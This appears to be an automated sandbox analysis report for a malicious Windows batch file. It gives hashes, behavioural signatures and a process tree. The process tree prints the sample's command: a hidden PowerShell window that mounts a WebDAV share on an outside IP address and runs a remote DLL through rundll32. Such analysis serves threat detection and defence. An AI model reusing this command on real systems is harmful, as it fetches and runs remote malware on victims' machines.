Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
15/07/2024, 05:55
Static task
static1
Behavioral task
behavioral1
Sample
1803324061565210265.bat
Resource
win7-20240705-en
6 signatures
150 seconds
Behavioral task
behavioral2
Sample
1803324061565210265.bat
Resource
win10v2004-20240709-en
8 signatures
150 seconds
General
-
Target
1803324061565210265.bat
-
Size
2KB
-
MD5
e3a3f489f78dac718fb3b193b643a565
-
SHA1
795443474290ece121ccb5cff0f100715b487d25
-
SHA256
159c63fd55f78213a6a7787bc0ff912884232adeb6202e76fe4e5c357b79802d
-
SHA512
0b4512166a3bed0a45225959b7353fd9d8d09721a67edcecb18855b38b8383ca706a50c66afcced996e7f7c0dad51e7761d7ef4a4d1aa607c9b6ae1599fe3ab0
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3000 powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3000 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3000 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2916 wordpad.exe 2916 wordpad.exe 2916 wordpad.exe 2916 wordpad.exe 2916 wordpad.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2972 wrote to memory of 2916 2972 cmd.exe 31 PID 2972 wrote to memory of 2916 2972 cmd.exe 31 PID 2972 wrote to memory of 2916 2972 cmd.exe 31 PID 2972 wrote to memory of 3000 2972 cmd.exe 32 PID 2972 wrote to memory of 3000 2972 cmd.exe 32 PID 2972 wrote to memory of 3000 2972 cmd.exe 32 PID 3000 wrote to memory of 2804 3000 powershell.exe 34 PID 3000 wrote to memory of 2804 3000 powershell.exe 34 PID 3000 wrote to memory of 2804 3000 powershell.exe 34 PID 3000 wrote to memory of 2176 3000 powershell.exe 35 PID 3000 wrote to memory of 2176 3000 powershell.exe 35 PID 3000 wrote to memory of 2176 3000 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\1803324061565210265.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\470.dll,entry2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\3⤵PID:2804
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\470.dll entry3⤵PID:2176
-
-